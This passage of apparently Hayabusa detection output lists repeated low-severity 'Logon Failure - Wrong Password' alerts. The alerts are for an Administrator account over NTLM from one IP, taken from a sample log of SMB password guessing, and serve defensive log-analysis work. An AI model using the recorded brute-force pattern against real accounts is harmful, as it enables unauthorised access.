NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
